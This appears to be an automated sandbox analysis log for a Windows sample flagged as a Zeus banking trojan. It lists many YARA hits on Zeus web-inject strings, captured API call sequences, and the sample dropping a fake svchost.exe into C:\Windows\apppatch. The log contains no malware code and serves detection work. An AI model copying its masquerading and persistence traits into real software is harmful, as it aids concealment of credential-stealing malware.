    Source: 1.3.svchost.exe.39c0000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.406400.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2a06c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.892000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2cf3c00.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.88d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.406400.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.cUKxeliGgCix.exe.2be0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.5AFlyarMds.exe.704510.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.5AFlyarMds.exe.705110.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2cf3c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 8.2.cUKxeliGgCix.exe.2522000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.19.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.cUKxeliGgCix.exe.15e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.cUKxeliGgCix.exe.2550000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.2a60000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.cUKxeliGgCix.exe.2cc2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Yara match, File source: 0.2.5AFlyarMds.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 0.3.5AFlyarMds.exe.6ff110.0.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 1.3.svchost.exe.888000.4.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 0.2.5AFlyarMds.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 1.3.svchost.exe.888000.2.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
    Source: Yara match, File source: 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
    Source: Yara match, File source: 00000001.00000003.1744603416.0000000000888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: 5AFlyarMds.exe PID: 7508, type: MEMORYSTR
    Source: Yara match, File source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTR
    Source: C:\Windows\apppatch\svchost.exe, Code function: 1_2_02C979E0 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,1_2_02C979E0
    Source: C:\Windows\apppatch\svchost.exe, Code function: 1_2_02C93A20 VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,1_2_02C93A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe, Code function: 5_2_02F63A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,5_2_02F63A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe, Code function: 6_2_02553A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,6_2_02553A20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe, Code function: 8_2_025C3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,8_2_025C3A20
    Source: C:\Users\user\Desktop\5AFlyarMds.exe, Code function: 0_2_004021D0: CreateFileA,DeviceIoControl,CloseHandle,0_2_004021D0
    Source: C:\Users\user\Desktop\5AFlyarMds.exe, Code function: 0_2_004018E0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,0_2_004018E0
    Source: C:\Users\user\Desktop\5AFlyarMds.exe, File created: C:\Windows\apppatch\svchost.exe
    Source: C:\Users\user\Desktop\5AFlyarMds.exe, File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA
    Source: C:\Users\user\Desktop\5AFlyarMds.exe, Process token adjusted: Security
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804
    Source: svchost.exe.0.dr, Static PE information: Number of sections : 13 > 10
    Source: 5AFlyarMds.exe, Static PE information: Number of sections : 13 > 10
    Source: 5AFlyarMds.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Matched in the following sources (type: UNPACKEDPE):
    Source: 1.3.svchost.exe.39c0000.10.unpack
    Source: 0.2.5AFlyarMds.exe.400000.1.unpack
    Source: 1.2.svchost.exe.2c90000.6.unpack
    Source: 1.3.svchost.exe.39c0000.32.unpack
    Source: 1.3.svchost.exe.39c0000.15.unpack
    Source: 23.2.cUKxeliGgCix.exe.3200000.2.raw.unpack
    Source: 1.3.svchost.exe.39c0000.23.unpack
    Source: 1.3.svchost.exe.39c0000.13.unpack
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.raw.unpack
    Source: 1.3.svchost.exe.39c0000.21.unpack
    Source: 1.3.svchost.exe.39c0000.14.raw.unpack
    Source: 1.3.svchost.exe.39c0000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.29b2000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
